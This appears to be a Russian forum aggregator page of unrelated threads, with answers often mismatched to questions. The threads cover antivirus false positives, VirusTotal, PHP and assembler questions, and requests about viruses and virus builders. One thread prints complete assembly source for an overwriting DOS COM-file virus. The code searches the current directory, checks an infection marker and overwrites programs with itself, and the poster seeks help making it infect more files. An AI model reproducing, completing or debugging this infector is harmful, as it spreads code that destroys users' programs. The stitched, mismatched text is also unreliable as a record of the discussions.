Все технические форумы на одном сайте Удобный поиск информации с популярных форумов в одном месте
Вопрос: vb6 проги и virustotal - почему распознает вирус

хотел бы поинтересоваться насчет взгладов антивирусников на exe собранные на vb6.
недавно проверил свою прожку на virustotal и он показал отрицательный результат по некоторым позициям (антивирусникам)
самое что интересное. просто создал форму, кинул кнопку, закомпилил. закинул на вирустотал и что я вижу 3 / 55

CAT-QuickHeal (Suspicious) - DNAScan 20160523
Malwarebytes Backdoor.Bot 20160524
Qihoo-360 HEUR/QVM03.0.0000.Malware.Gen

не понятно почему для этих антивирусников этот простой ехе стал подозрительным.

У всех так? проги которые собрали на vb6 считают вирусами некоторые антивирусники (ну или подозрительными ).
Ответ: Ну думаю вряд ли у меня чтото сидит. иначе бы любые exe бы распознавались как подозрительные в virustotal. такое поведение именно с vb6 программами. и антивирусник вроде нормально работает, по крайней мере аномалий не замечал в работе пк. стоит KIS.
может я и не прав но вот такие антивирусники как CAT-QuickHeal Malwarebytes Qihoo-360 вообще считаю нубо-антивирусниками,
как тот же аваст, который не хочет защитить ваш компьютер а хочет сказать вам что вирусная база успешно обновлена.
Вопрос: Проблема с VirusTotal

Почему exe-файл, имеющий всего несколько простых команд, скомпилированный в MVS 2012, определяется как suspected of Trojan.Downloader.gen.h антивирусом VBA32 ?
Имеет команды скачивания html-страниц.
Но проверял и другие программы - вырезание, удаление файлов тоже не любят некоторые антивирусы.
Ответ:
ukugyul552465
Каким же образом будет работать программа, содержащая множество таких "нелюбимых" операций, если на компьютере будет стоять один из придирающихся антивирусов?


Это отдельная головная боль.
Решается написанием письма разработчикам антивируса(ов). Зависит от того, что за антивирус. Лаг ответа может доходить до месяца, но всё ещё может усугубляться (не)вменяемостью саппорта. После прохождения квеста программа перестаёт определятся антивирусами, как опасная. Последний раз мне прислали просьбу разобраться в сабжем, где срабатывало 2 антивируса, один корейский, какой не помню, так как за день всё решилось, второй сингапурский, bkav, это капец. Они месяц молчали, потом ответили, потом на мои письма постоянно спрашивали мой номер телефона и аккаунт и каким их мобильным(!) софтом я пользуюсь, хотя я подробно описал, в чём проблема (virustotal + десктоп), но не помогло. Я уже забил было и не стал отвечать, но через неделю опять пришло письмо с той же просьбой. Тут я уже испугался :) Но через 1-2 недели всё прошло и починилось.

А самый апофеоз антивирусизма - Norton Antivirus. Я купил лаптоп с предустановленным этим чудом. Поставил студию, загрузил проект, чё-то там покопался и сбилдил релиз. И тут же получил уведомление от чуда, что "эта программа используется менее чем 5 членами сообщества NAV!" и кнопка [OK]. Ну ладно, пофиг мне, это ж я её сам только что собрал. Иду за релизом. А нету. Странно, думаю. Запускаю билд ещё раз, и снова тоже самое сообщение, ехе-шника нет! >_< Отказаться нельзя, одна кнопка [OK]. Снёс нафиг.
Перед новым годом вот купил-собрал себе новый комп, там с софтом к матери был этот самый NAV. История повторилась. Качал из сети какой-то длинный дистрибутив, долго. Запустил. Чудо вылезло со словами "какая-то подозрительная программа..." и опять только кнопка [OK]. Ну ок, так ок... После чего дистрибутив молча исчез с винта. >_< Снёс нафиг.
Вопрос: Вирус? Не, не слышал

Всем привет.
Скорее всего я не первый, кто сталкивается с этой проблемой. Вы когда-нибудь писали хороший проект и хотели бы привлечь к нему внимание? Недавно написал одну программу, решил разослать по форумам. Как обычно, правила требуют ссылку на сканирование на вирусы. Один из таких сервисов virustotal. Сделал значит я сканирование.. какой-то VBA32 говорит, что это вирус. Подумал.. Наверное из-за проверки новой версии через сайт. Тем более один антивирус не так уж и много - совсем не страшно. Сделал рассылку на форумы... И что вы думаете? Абсолютно на всех форумах мне прилетел вечный бан на аккаунт. Причина "Рассылка вредоносного ПО". Суть в том, что virustotal продает базы другим антивирусам, после чего твою программку все больше антивирусов считает вирусом. Конечно я все понимаю, это бизнес, но почему моя программа вообще попала в вирусные базы. Есть ли вообще у АВ какие-нибудь FAQ, где написано что-то типа: "Не используйте слово Hello World в своей программе. Это явно будет выглядеть как вирус"? Кто сталкивался с такой проблемой, напишите пожалуйста, какое решение вы принимали? Можно было бы отправить файл на проверку в вирусные компании, но для программы, которая постоянно обновляется - это проблема.
Ответ: Все мои программы на делфи всеми антивирусами всегда считались вредоносными.
Скоро такими темпами "чистыми" начнут считать только те программы, авторы которых занесли бабла создателям антивирусов.
Тут уже бесполезно что-то делать, т.к. тут сознание людей менять надо, которые всё вокруг считают вирусами, а их разводят как лохов (при этом самые настоящие вредоносные программы легко преодолевают все защиты, обычно при активнейшем содействии самих жертв).
Вопрос: Работа с VirusTotal

Привет, форумчане!
Недавно нашёл такой сайт, на котором онлайн можно проверить выбранные файлы или папки на вирусы. virustotal.com
Как сделать такой код, чтобы пользователь моего приложения мог выбрать файл или папку, а затем то что он выбрал отправлялось на сайт, проверялось и результаты выводились на экран приложения?
И еще: если найден вирус, то код для удаления (если можно).

Заранее спасибо!

--ТУРБО--
Ответ: Orlangur1991, да нет)
спасибо огроменное!
Вопрос: вирус Vienna

Здравствуйте, уважаемые форумчане.

Дело в том, что в программировании я полный нуб. А мне на днях сдавать курсовую на тему: "Компьютерный вирус конца 80-х — начала 90-х годов".
С огромным трудом удалось найти вирус Vienna.
Кто-нибудь может объяснить мне, как он работает? Если это возможно, то напишите комментарий напротив каждой строки. Расскажите, пожалуйста, что он делает и как.

Насколько я понимаю, исходный код находится на странице 149.
Ответ:
Сообщение от Jin X
Тебе же в магазине с ножом не дают инструкцию что с ним можно делать
Jin X, а что копаясь с регистрами и инструкциями ты не понимаешь что делаешь? Написать случайно вирус это все равно что обезьяне "Войну и Мир" Толстого написать. Тут полное сознание того что ты делаешь и ответственность за это. А писать прогу для защиты от чего? От вируса. Дык надо понять как он работает. Во многих книгах идет описание как наваять вирус, а потом как его вычистить. Мне лично в этих книгах просто очень были интересны эти технологии. Техники в этих книгах равносильны тому что рассказывать ученым ядерщикам о создании пороха.
Сообщение от Jin X
но что говорить об уже готовом "оружии"?
Да где оно готовое, сплошная сыромятина, поэтому и выпустили в тираж эти книги.

Сообщение от Jin X
или наркотики и использовать их в благих целях (в медицинских, например).
Их и используют в медицинских для обезболивания. Например, при раковых заболеваниях. Иногда при таких болях и автомат бы не помешал, даже наркота не помогает. Иногда людям лучше сделать эвтаназию, чем терпеть такие боли. У меня у двух знакомых дети на руках помирали в мучениях вот ты им расскажи где наша бесплатная медицина была в это время со своими бесплатными лекарствами хорошего качества.

Сообщение от Jin X
Когда человека обучают боевым искусствам, ему постоянно внедряют в голову мысль (воспитывают), что свои умения нужно использовать только в благих целях – для защиты. И соизмерять силу атаки, чтобы не покалечить человека. А если видят, что человек неадекватен, его отстранят от таких занятий.
Ты о чем? У нас все тренера по боксу на пол ставки, чтобы с голоду не сдохнуть на основной работе. И ты думаешь им до воспитания каких то моральных качеств с такой зарплатой есть дело. И что значит учат соизмерять силу атаки? Это что какие то специальные тренировки? Если знаешь расскажи, мне этого не ведомо. Когда выходишь на ринг или на улице против нескольких, нет никакого соизмерения. Есть одно - или ты, или тебя - третьего не дано и ты не думаешь своей башкой о силе удара, одни инсктинты которые воспитали в тебе годами. Дело Мирзаева. Кстати был у нас на сборах, нормальный парень. Если в тебе 60 кг., а к тебе подходит чувак под 100 кг., да не один, ты будешь думать о силе удара? На тренировках ты работаешь на скорость и на силу удара, но никак ни на какую соизмеримость и это у тебя откладывается в каждой клетке твоего тела. Соизмеримость - это контроль. Силы спортсмена ограничивать нельзя - это уже не спортсмен. На мой взгляд так и программист. Он должен постоянно развиваться, совершенствоваться, тогда и только тогда он станет классным кодером. А уж как использовать полученные знания - это опять другая история.
Вопрос: Не распознает текст

Не распознает текст на ftp сервере, хотя кодировка верна. Ошибок так же не пишет, в чем может быть проблема? Может ли быть связанно с кодировкой в бд?
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
<?
 
//Главная директория
 
$main_directory='/lr3/';
 
$tables=array
 
(
 
1=>array
 
(
 
'name'=>'autoprokat', 'label'=>'Автопрокат', 'fields'=>array
 
(
 
array('name'=>'id', 'label'=>'№'),
 
array('name'=>'contact_adress', 'label'=>'Адрес'),
 
array('name'=>'name_autoprokat', 'label'=>'Название')
 
)
 
),
 
2=>array
 
(
 
'name'=>'client', 'label'=>'Клиенты', 'fields'=>array
 
(
 
array('name'=>'id', 'label'=>'№'),
 
array('name'=>'fio', 'label'=>'ФИО'),
 
array('name'=>'phone', 'label'=>'Номер телефона'),
 
array('name'=>'staj_vojdenia', 'label'=>'Водительский стаж')
 
)
 
),
 
3=>array
 
(
 
'name'=>'classific', 'label'=>'Комплектация', 'fields'=>array
 
(
 
array('name'=>'id', 'label'=>'№'),
 
array('name'=>'marka', 'label'=>'Марка автомобиля'),
 
array('name'=>'view', 'label'=>'Вид автомобиля'),
 
array('name'=>'class', 'label'=>'Класс')
 
)
 
),
 
4=>array
 
(
 
'name'=>'auto', 'label'=>'Дисциплины', 'fields'=>array
 
(
 
array('name'=>'id', 'label'=>'№'),
 
array('name'=>'id_autoprokat', 'label'=>'№ проката', 'f_table'=>'autoprokat', 'f_field'=>'id', 'f_select'=>'`autoprokat`.`name_autoprokat`'),
 
array('name'=>'id_client', 'label'=>'№ клиента', 'f_table'=>'client', 'f_field'=>'id', 'f_select'=>'`client`.`fio`'),
 
array('name'=>'date_polych', 'label'=>'Дата получения'),
 
array('name'=>'id_classific', 'label'=>'№ комплектации', 'f_table'=>'classific', 'f_field'=>'id', 'f_select'=>'`classific`.`marka`'),
 
array('name'=>'color', 'label'=>'Цвет'),
 
array('name'=>'date_vozvrat', 'label'=>'Дата возврата'),
 
array('name'=>'price', 'label'=>'Цена')
 
)
 
),
 
5=>array
 
(
 
'name'=>'dtp', 'label'=>'ДТП', 'fields'=>array
 
(
 
array('name'=>'id', 'label'=>'№'),
 
array('name'=>'date_dtp', 'label'=>'Дата'),
 
array('name'=>'lvl_damage', 'label'=>'Повреждения'),
 
array('name'=>'id_auto', 'label'=>'№ автомобиля', 'f_table'=>'auto', 'f_field'=>'id', 'f_select'=>'`auto`.`id`')
 
)
 
)
 
);
 
$menu_id=isset($_GET['menu_id']) ? $_GET['menu_id'] : 0;
 
$body='';
 
$tables_action=isset($_GET['tables_action']) ? $_GET['tables_action'] : '';
 
$msg=isset($_GET['msg']) ? urldecode($_GET['msg']) : '';
 
$title_text=$menu_id > 0 ? $tables[$menu_id]['label'] : 'Главная страница';
 
$mysqli=new mysqli('mysql.hostinger.ru', 'u1111111111_login', '1111111', 'u11111111_db');
 
if($mysqli->connect_errno)
 
{
 
$msg='Не удалось подключиться к БД.';
 
}
 
else
 
{
 
$mysqli->query(utf8);
 
}
 
?>
Ответ:
HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<!DOCTYPE HTML>
 
<html>
 
<head>
 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 
<title>
 
<?
 
echo $title_text;
 
?>
 
</title>
 
<link type="text/css" rel="stylesheet" href="styles.css">
 
</head>
 
<body>
Добавлено через 2 минуты
Так, все разобрался. Почему то при копировании кода символы "-" преобразовываются в "*" и нотпад отображает звезды как -
Вопрос: C++ "Вирус"

Здравствуйте, пока у меня есть свободное время для программирования, я решил написать "Вирус" на С++.
Вирус, как вы возможно уже могли понять по ковычкам, не чего общего с вредоносными программами не имеет, хотя то что я собираюсь написать, спокойно можно переделать в вредоносную программу.

Я не буду вас просить о помощи в написании кода, так как делаю его чисто ради практики.

Идея "вируса" готова но пока-что не знаю как её реализовать.

План: Я пишу программу на С++ запуская которую, жесткий диск проверяется на наличие Антивируса. (Программа ищет все возможние популярные антивирусы).

В случии, есле антивирус не найден, программа запускает (заставку), на каторой написано, почему она выскачила, и о рисках запускания таких программ как моя, от не знакомых людей.

После того, как юзер прочитал заставку и подтвердил что ознакомился о рисках, у юзера запускается Дэфолтный браузер, с !Оффициальным! адресом Антивируса. (Безплатным конечьно).

В конечьном этоге, "вирус", через несколько дней заного проверяет на наличие Антивируса, и есле такой существует, "Вирус" удаляется.

Повторяю! Это всего лишь проект, и я не ставлю цели как либо навредить пользователю.

Вопрос: Какую среду программирования я должен изпользовать, что-бы реализовать, всё что я запланировал для программы?

P.S Прошу перенести пост в другой отдел С++, есле есть такая необходимость, так, как я не был уверен, где это можно было бы спросить.
P.S 2, Нет, я не школохацкер.
Ответ: не будешь конечно. тема закрыта.
обсуждение вирусов и вирусоподобных программ запрещено правилами.
Вопрос: Матрица a не работает в другой прог

Здравствуйте. В ячейку матрицы a загружаются кординаты точки, первое слово (16 байт) y и смещается в лево, второе слово x. Матрица a при переводе из одной прог. в другую не работает. Если загрузить одни 0, то отработает или вместо загрузки mov dx,x , загружать в два слова т.е. mov edx,x то тоже отработает в другой прог. Если матрицу a, с загрузкой в одно слово т.е. оставить в старой прог. то она будет работать. Заранее благодарю.

Assembler
1
2
3
4
5
6
7
8
9
10
11
12
13
 mov dx,y
    shl edx,16
    mov dx,x
           
     push ecx
     xor ecx,ecx
    mov ecx,countA
             
     push eax
     xor eax,eax
    lea eax,a
    mov [eax+4*ecx],edx 
      pop eax
Ответ: Прошу извинить, что сразу не ответил, работаю.
Первая прог.
Delphi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
LL: integer;
x,y: short;
    asm
       push edx
     xor edx,edx
 
    mov y,100
    mov x,150
    mov dx,y
    shl edx,16
    mov dx,x
    mov LL,edx
 
     pop edx
 end;
   f:=TFileStream.Create('C:\filename LL.dat',fmCreate);
   f.Write(LL, sizeOf(LL));
   f.Free;
Вторая прог.
Delphi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
  f:=TFileStream.Create('C:\Filename LL.dat',fmOpenRead);
  f.Read(LL, sizeOf(LL));
  f.Free;
 
 asm
    push edx
        xor edx,edx
 
      mov edx,LL
      mov x,dx
      shr edx,16
      mov y,dx
 
        pop edx
 
        push edx
        xor edx,edx
 
      mov dx,x
      mov XX,edx
 
        pop edx
 
        push edx
        xor edx,edx
 
       mov dx,y
       mov edx,YY
 
         pop edx
  end;
ответ.
x=150
y=2004885726
Как видите по y ошибка. XX и YY это переменные для вывода данных.

Добавлено через 35 минут
Прошу извинить, ошибку нашёл в этих двух прог. Во второй прог. вместо mov edx,YY , mov YY,edx и все будет нормально, почему тогда это не работает в матрице?
Вопрос: Неправильная работа вируса

Написал вирус. Задача: затирать код COM-программ и заменять его кодом вируса. Поиск COM-программ осуществляется в текущем каталоге. За 1 раз программа должна заражать 1 файл. Один раз заразить один и тот же файл невозможно, так как у всех зараженных файлов по смещению 102h находится 5566h. Т.е. если данный файл не подходит для заражения, то мы ищем следующий. Однако перемещая программу(virus.com) в каталог с двумя(или более) файлами, он заражает только один. При повторном запуске заражение остальных файлов не происходит.
Думаю, что не работает программа именно в этом месте:
Assembler
1
2
3
4
5
Inf_file:
     call Infect_file
     jnc Nomore_files
     call Find_next
     jnc Inf_file
Потому что, проследив работу программы в отладчике, я вижу, что каждый раз функция Find_next не находит других файлов в каталоге. Помогите, пожалуйста, и объясните ошибку, почему не ищутся и не заражаются другие файлы. Вот код:
Assembler
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
.286
CSEG segment
assume cs:CSEG, ds:CSEG, es:CSEG, ss:CSEG
org 100h
 
Begin:
     jmp Init
     dw 5566h
     nop
     nop
     nop
     nop
     nop
     int 20h
 
Find_first proc
     mov ah, 4Eh
     xor cx, cx
     mov dx, offset Mask_file
     int 21h
     ret
Mask_file db '*.com',0
Find_first endp
 
Find_next proc
     mov ah, 4Fh
     xor cx, cx
     mov dx, 80h
     int 21h
     ret
Find_next endp
 
Open_file proc
     mov ax, 3D02h
     mov dx, 9Eh
     int 21h
     mov bx, ax
     mov Handle, ax
 
     ret
Handle dw 0FFFFh
Open_file endp
 
Close_file proc
     cmp Handle, 0FFFFh
     je No_close
     mov bx, Handle
     mov ah, 3Eh
     int 21h
No_close:
     ret
Close_file endp
 
Infect_file proc
     call Open_file
     jc Error_Infect
 
     mov ah, 40h
     mov cx, 4
     mov dx, offset Finish
     int 21h
     jc Error_Infect
 
     mov bx, dx
     cmp word ptr [bx+2], 5566h
     je Error_Infect
 
     call Close_file
     jc Error_Infect
     call Open_file
     jc Error_Infect
 
     mov ah, 40h
     mov cx, offset Finish-100h
     mov dx, offset Begin
     int 21h
     jc Error_Infect
 
     call Close_file
     clc
     ret
 
Error_Infect:
     stc
     ret
Infect_file endp
 
Init:
     call Find_first
     jc Nomore_files
Inf_file:
     call Infect_file
     jnc Nomore_files
     call Find_next
     jnc Inf_file
Nomore_files:
     push 102h
     ret
 
Finish equ $
 
CSEG ends
end Begin
Ответ:
Сообщение от Constantin Cat
учебного вируса
Запрещено обсуждать любые вирусы. Закрыто
Вопрос: Исходник билдера вирусов

Доброго времени суток, ищу в сети простейший исходник билдера на с++, искал в гугле на русском/английском языках, находил только для делфи, а мне нужен написанный на с++. Для тех кто не понял приведу пример, есть такие программы как генераторы вирусов, типа Кузя, создающие ехе шники с заданными вами параметрами, мне нужен простейший исходник такого билдера, что бы понять сам принцып. Вирусы я конечно же делать не собираюсь, привел для примера.
Ответ: Я так и не понял почему просто не использовать файл с настройками, это ж удобнее.

Билдер для вирусов вероятно нужен только для того чтобы кинуть жертве один .ехе вместо архива (многие не поймут как разархивировать).